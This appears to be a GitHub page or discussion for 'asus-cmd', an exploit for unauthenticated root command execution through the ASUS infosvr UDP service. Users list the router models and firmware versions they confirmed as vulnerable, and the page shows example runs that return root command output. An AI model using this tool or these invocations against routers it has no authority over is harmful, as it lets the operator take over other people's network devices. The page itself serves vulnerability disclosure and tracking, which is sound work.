jduck / asus-cmd
ASUS Router infosvr UDP Broadcast root Command Execution
extendno=6587-gaa506e9
firmver=3.0.0.4
The AC68U with stock firmware is vulnerable. Firmware version: 3.0.0.4.376_3626-g9a8323e
Input:
sudo ./asus-cmd "nvram show"
Output:
[*] sent command: nvram show
[!] received 512 bytes from 192.168.1.90:34285
0c 15 0033 5a6c89a6 41:41:41:41:41:41
000a nvram show
I have a direct ethernet connection to the router.
Firmware version 3.0.0.4.374_4422-gc83c78f
Latest firmware fixes this: 3.0.0.4.376_3754-g5ef7c1f
It can't be downloaded automatically; you must download it manually from the Support Site here: http://www.asus.com/Networking/RTN66U/HelpDesk_Download/
I have confirmed the DSL-AC68U is vulnerable running firmware 3.0.0.4.376_2158-g340202b
Asus RT-N12E is vulnerable with firmware prior to version 2.0.0.37.
All RT-N12E models prior to RT-N12E B1 are end-of-life. As far as I'm aware, the only RT-N12E model prior to RT-N12E B1 was simply known as RT-N12E. This ancient device bears the marking "H/W Ver: A" - implying it's model A or A1, however this is not mentioned in the product name nor anywhere on the administrative web interface.
Off the shelf, the device is labelled with "F/W Ver: 1.1.0.13".
Tested on my RT-N12HP_B1 firmware version 3.0.0.4.374_1327
$ ./asus-cmd "echo \$USER"
[*] sent command: echo $USER
[!] received 512 bytes from 192.168.1.22:62134
0c 15 0033 54b4f46d 41:41:41:41:41:41
000a echo $USER
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
[!] received 512 bytes from 192.168.1.1:9999
0c 16 0033 54b4f46d e0:3f:49:91:54:b4
0005 root
Tested on firmware version 3.0.0.4.370.
ASUS RT-N16 running firmware 3.0.0.4.220 (not merlin) is vulnerable.
WL-330NUL seems not to be an officially supported device. But its codebase is Merlin and I could verify the vulnerability by starting infosvr "manually" from the console and invoking the asus-cmd exploit.
In case you'd like to add to the list of affected hardware, I've confirmed that the ASUS RT-N56U running firmware 3.0.0.4.374_5656 is vulnerable.
This issue also affects the ASUS WL-500g (from about 9 years ago). The format of the infosvr protocol header is probably different. Here was some old code I had to exercise one of the innocuous OpCodes:
https://github.com/awalls-cx18/wl500g-infoclient/blob/master/infoclient.c#L55